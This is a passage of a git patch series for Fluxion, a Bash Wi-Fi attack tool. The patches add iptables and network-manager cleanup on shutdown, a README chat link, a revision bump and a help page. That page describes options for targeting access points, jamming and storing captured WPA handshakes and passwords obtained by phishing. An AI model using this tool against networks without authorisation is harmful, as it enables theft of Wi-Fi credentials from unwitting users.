<"$FLUXIONIPTablesBackup" \ + &> $FLUXIONOutputDevice + else + iptables --flush + iptables --table nat --flush + iptables --delete-chain + iptables --table nat --delete-chain + fi + echo -e "$CWht[$CRed-$CWht] $FLUXIONRestoringTputNotice$CClr" tput cnorm @@ -352,9 +359,11 @@ fluxion_shutdown() { # TODO: Add support for other network managers (wpa_supplicant?). if [ $(which systemctl) ]; then - service network-manager restart &> $FLUXIONOutputDevice & - service networkmanager restart &> $FLUXIONOutputDevice & - service networking restart &> $FLUXIONOutputDevice & + if [ $(which service) ];then + service network-manager restart &> $FLUXIONOutputDevice & + service networkmanager restart &> $FLUXIONOutputDevice & + service networking restart &> $FLUXIONOutputDevice & + fi else systemctl restart network-manager.service &> $FLUXIONOutputDevice & fi From 70bdc012324f4a07c94338fde33dc704b1ddc35a Mon Sep 17 00:00:00 2001 From: deltax Date: Thu, 1 Feb 2018 16:43:45 +0100 Subject: [PATCH 43/45] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index bbc77e7..fce9a71 100644 --- a/README.md +++ b/README.md @@ -3,6 +3,7 @@ # Fluxion is the future of MITM WPA attacks Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) less bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phising) attack. It's compatible with the latest release of Kali (rolling). Fluxion's attacks' setup is mostly manual, but experimental auto-mode handles some of the attacks' setup parameters. Read the [FAQ](https://github.com/FluxionNetwork/fluxion/wiki/FAQ) before requesting issues. +If you need quick help, fluxion is also avaible on gitter. You can talk with us [here](https://gitter.im/FluxionNetwork/Lobby) ## Installation Read [here](https://github.com/FluxionNetwork/fluxion/wiki/Generate-ssh-keys) before you do the following steps.
From 7d024460822a61b7c5d56cab79f6e9c39a17db18 Mon Sep 17 00:00:00 2001 From: Erik Dubois Date: Thu, 1 Feb 2018 16:46:24 +0100 Subject: [PATCH 44/45] Update revision number --- fluxion | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fluxion b/fluxion index cf44983..7477daa 100755 --- a/fluxion +++ b/fluxion @@ -23,7 +23,7 @@ readonly FLUXIONNoiseFloor=-90 readonly FLUXIONNoiseCeiling=-60 readonly FLUXIONVersion=4 -readonly FLUXIONRevision=3 +readonly FLUXIONRevision=4 # Declare window ration bigger = smaller windows FLUXIONWindowRatio=4 From c54fbdf51a4b2769030f745094749878668643da Mon Sep 17 00:00:00 2001 From: deltax Date: Sat, 3 Feb 2018 11:54:15 +0100 Subject: [PATCH 45/45] Create Help.sh --- lib/Help.sh | 96 +++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 96 insertions(+) create mode 100644 lib/Help.sh diff --git a/lib/Help.sh b/lib/Help.sh new file mode 100644 index 0000000..9ffdb99 --- /dev/null +++ b/lib/Help.sh @@ -0,0 +1,96 @@ +#!/bin/bash + +function fluxion_help{ + echo " FLUXION(1) User Manuals FLUXION(1) + + + + NAME + fluxion - Fluxion is a security auditing and social-engineering + research tool + + SYNOPSIS + fluxion [-debug] [-l language ] attack ... + + DESCRIPTION + fluxion is a security auditing and social-engineering research tool. + It is a remake of linset by vk496 with (hopefully) less bugs and more + functionality. The script attempts to retrieve the WPA/WPA2 key from a + target access point by means of a social engineering (phising) attack. + It's compatible with the latest release of Kali (rolling). Fluxion's + attacks' setup is mostly manual, but experimental auto-mode handles + some of the attacks' setup parameters. + + OPTIONS + -v Print version number. + + --help Print help page and exit with 0. + + -m Run fluxion in manual mode instead of auto mode. + + -k Kill wireless connection if it is connected. + + -d Run fluxion in debug mode. + + -x Try to run fluxion with xterm terminals instead of tmux. + + -r Reload driver. + + -l + Define a certain language. + + -e + Select the target network based on the ESSID. + + -c + Indicate the channel(s) to listen to. + + -a + Define a certain attack. + + --ratio + Define the windows size. Bigger ratio -> smaller window size. + Default is 4. + + -b + Select the target network based on the access point MAC address. + + -j + Define a certain jamming interface. + + -a + Define a certain access point interface. + + FILES + /tmp/fluxspace/ + The system wide tmp directory. + $FLUXION/attacks/ + Folder where handshakes and passwords are stored in. + + ENVIRONMENT + FLUXIONAuto + Automatically run fluxion in auto mode if exported. + + FLUXIONDebug + Automatically run fluxion in debug mode if exported. + + FLUXIONWIKillProcesses + Automatically kill any interfering process(es). + + DIAGNOSTICS + Please checkout the other log files or use the debug mode. + + BUGS + Please report any bugs at: https://github.com/FluxionNetwork/flux- + ion/issues + + AUTHOR + Cyberfee, l3op, dlinkproto, vk496, MPX4132 + + SEE ALSO + aircrack-ng(8), + + + Linux MARCH 2018 FLUXION(1)" + +}